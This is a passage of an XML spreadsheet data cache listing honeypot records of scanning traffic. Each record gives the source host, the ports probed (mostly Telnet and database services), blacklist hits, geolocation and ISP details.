    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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9:e40b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2669"/>
    <x v="2669"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T22:18:12"/>
    <d v="2025-04-07T22:18:12"/>
    <d v="2025-04-07T22:18:12"/>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3b5f:85c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2670"/>
    <x v="2670"/>
    <s v="125-228-47-215.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T22:16:31"/>
    <d v="2024-05-04T09:11:00"/>
    <d v="2025-04-07T22:16:31"/>
    <n v="1089"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H39"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;47653&amp;&amp;23&amp;&amp;54303&amp;&amp;9100&amp;&amp;57777&amp;&amp;57801&amp;&amp;32316&amp;&amp;57825&amp;&amp;57848&amp;&amp;27785"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:2fd7"/>
    <s v="C-I_D"/>
    <s v="medium&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2671"/>
    <x v="2671"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T21:55:08"/>
    <d v="2025-03-20T13:56:32"/>
    <d v="2025-04-07T21:55:08"/>
    <n v="84"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H17"/>
    <s v="3306&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="HK"/>
    <s v="Hong Kong"/>
    <s v="NA"/>
    <s v="Kowloon"/>
    <s v="NA"/>
    <s v="Hong Kong"/>
    <s v="1819729"/>
    <s v="999077"/>
    <s v="22.3193"/>
    <s v="114.169"/>
    <s v="400619"/>
    <s v="AROSSCLOUD INC."/>
    <s v="Cloud"/>
    <s v="hosting"/>
    <s v="Fastmos Co Limited"/>
    <s v="2016-09-23"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9acc:b136"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2672"/>
    <x v="2672"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T21:39:52"/>
    <d v="2025-04-07T09:17:10"/>
    <d v="2025-04-07T21:39:52"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TR"/>
    <s v="Turkey"/>
    <s v="34"/>
    <s v="Istanbul"/>
    <s v="Kartal"/>
    <s v="Pendik"/>
    <s v="740616"/>
    <s v="NA"/>
    <s v="40.8994"/>
    <s v="29.2108"/>
    <s v="16135"/>
    <s v="TURKCELL ILETISIM HIZMETLERI A.S."/>
    <s v="Turkcell Internet"/>
    <s v="cellular"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b05b:b471"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2673"/>
    <x v="2673"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T21:33:12"/>
    <d v="2025-04-07T21:33:12"/>
    <d v="2025-04-07T21:33:12"/>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d8:1e46"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2674"/>
    <x v="2674"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T21:18:29"/>
    <d v="2025-04-07T21:18:29"/>
    <d v="2025-04-07T21:18:29"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="consumer"/>
    <s v="BSNL GSM NorthZone"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75db:3889"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2675"/>
    <x v="2675"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T20:55:57"/>
    <d v="2025-04-07T11:04:49"/>
    <d v="2025-04-07T20:55:57"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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business"/>
    <s v="NA"/>
    <s v="2007-08-01"/>
    <s v="NME-Project"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d3:8989"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2676"/>
    <x v="2676"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T20:41:36"/>
    <d v="2025-04-07T16:47:54"/>
    <d v="2025-04-07T20:41:36"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H8"/>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business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b59:1939"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2677"/>
    <x v="2677"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T20:18:17"/>
    <d v="2025-04-07T20:16:23"/>
    <d v="2025-04-07T20:18:17"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="WB"/>
    <s v="West Bengal"/>
    <s v="Kolkata"/>
    <s v="Kolkata"/>
    <s v="1275004"/>
    <s v="NA"/>
    <s v="22.5626"/>
    <s v="88.363"/>
    <s v="135872"/>
    <s v="GTPL KCBPL BROADBAND PVT LTD"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="residential"/>
    <s v="Gtpl Kcbpl Broadband PVT LTD"/>
    <s v="2016-03-15"/>
    <s v="GTPLKCBPL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67d3:86bc"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2678"/>
    <x v="2678"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T20:15:19"/>
    <d v="2025-04-07T20:12:47"/>
    <d v="2025-04-07T20:15:19"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="PB"/>
    <s v="Punjab"/>
    <s v="Ludhiana"/>
    <s v="Ludhiana"/>
    <s v="1264728"/>
    <s v="NA"/>
    <s v="30.912"/>
    <s v="75.8538"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="cellular"/>
    <s v="Vcon Mobile And Infra Private Limited"/>
    <s v="2010-11-26"/>
    <s v="QUADRANT-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:319c:6fe1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2679"/>
    <x v="2679"/>
    <s v="NA&amp;&amp;122-116-168-131.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-07T19:43:04"/>
    <d v="2025-01-19T12:00:49"/>
    <d v="2025-04-07T19:43:04"/>
    <n v="232"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H45"/>
    <s v="23&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2006-07-31"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:7a74:a883"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2680"/>
    <x v="2680"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T19:40:35"/>
    <d v="2025-04-07T19:40:35"/>
    <d v="2025-04-07T19:40:35"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Lucknow"/>
    <s v="Lucknow"/>
    <s v="1264733"/>
    <s v="NA"/>
    <s v="26.8393"/>
    <s v="80.9231"/>
    <s v="24560"/>
    <s v="AIRTELBROADBAND-AS-AP"/>
    <s v="Bharti Airtel"/>
    <s v="consumer"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:dfe2:e807"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2681"/>
    <x v="2681"/>
    <s v="static-ip-142-166-66-202.rev.dyxnet.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T19:29:11"/>
    <d v="2025-04-07T19:04:36"/>
    <d v="2025-04-07T19:29:11"/>
    <n v="19"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="South Delhi"/>
    <s v="Aya Nagar"/>
    <s v="13157005"/>
    <s v="NA"/>
    <s v="28.472"/>
    <s v="77.1327"/>
    <s v="134337"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="business"/>
    <s v="R2 Net Solutions Pvt Ltd"/>
    <s v="2015-12-03"/>
    <s v="R2NET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ca42:a68e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2682"/>
    <x v="2682"/>
    <s v="89102c31-a580-464e-aca8-81212020fc3e.pl-waw-2.baremetal.scw.cloud&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-07T19:21:20"/>
    <d v="2024-12-23T13:19:27"/>
    <d v="2025-04-07T19:21:20"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_SOCKS5_H11"/>
    <s v="8443&amp;&amp;1080"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="14"/>
    <s v="Mazovia"/>
    <s v="Przysucha County"/>
    <s v="Przysucha"/>
    <s v="761008"/>
    <s v="NA"/>
    <s v="51.3586"/>
    <s v="20.6289"/>
    <s v="12876"/>
    <s v="ONLINE S.A.S."/>
    <s v="Online S.A.S."/>
    <s v="hosting"/>
    <s v="Scaleway"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9773:5a8e"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2683"/>
    <x v="2683"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T19:18:53"/>
    <d v="2025-04-05T05:57:46"/>
    <d v="2025-04-07T19:18:53"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai (Borivali)"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.2307"/>
    <s v="72.8567"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="residential"/>
    <s v="Bharti Airtel Services Limited"/>
    <s v="2009-05-11"/>
    <s v="ABTS-DSL-MUM"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ee3:d28d"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2684"/>
    <x v="2684"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T19:18:06"/>
    <d v="2025-04-07T19:09:41"/>
    <d v="2025-04-07T19:18:06"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="BR"/>
    <s v="Bihar"/>
    <s v="Nalanda"/>
    <s v="Rājgīr"/>
    <s v="1258864"/>
    <s v="NA"/>
    <s v="25.0283"/>
    <s v="85.4208"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Rjil Internet"/>
    <s v="2010-10-27"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:312f:8706"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2685"/>
    <x v="2685"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T19:08:44"/>
    <d v="2025-01-21T16:08:13"/>
    <d v="2025-04-07T19:08:44"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d4:3891"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2686"/>
    <x v="2686"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T19:08:07"/>
    <d v="2025-04-04T22:20:12"/>
    <d v="2025-04-07T19:08:07"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="MG"/>
    <s v="Minas Gerais"/>
    <s v="Itajubá"/>
    <s v="Itajubá"/>
    <s v="3460834"/>
    <s v="NA"/>
    <s v="-22.4256"/>
    <s v="-45.4528"/>
    <s v="28202"/>
    <s v="Rede Brasileira de Comunicacao S/A"/>
    <s v="Rede Brasileira de Comunicacao S/A"/>
    <s v="business"/>
    <s v="Rede Brasileira de Comunicacao S/A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bf35:30d4"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2687"/>
    <x v="2687"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-07T18:13:52"/>
    <d v="2025-04-07T18:13:52"/>
    <d v="2025-04-07T18:13:52"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Janpath)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6296"/>
    <s v="77.2183"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
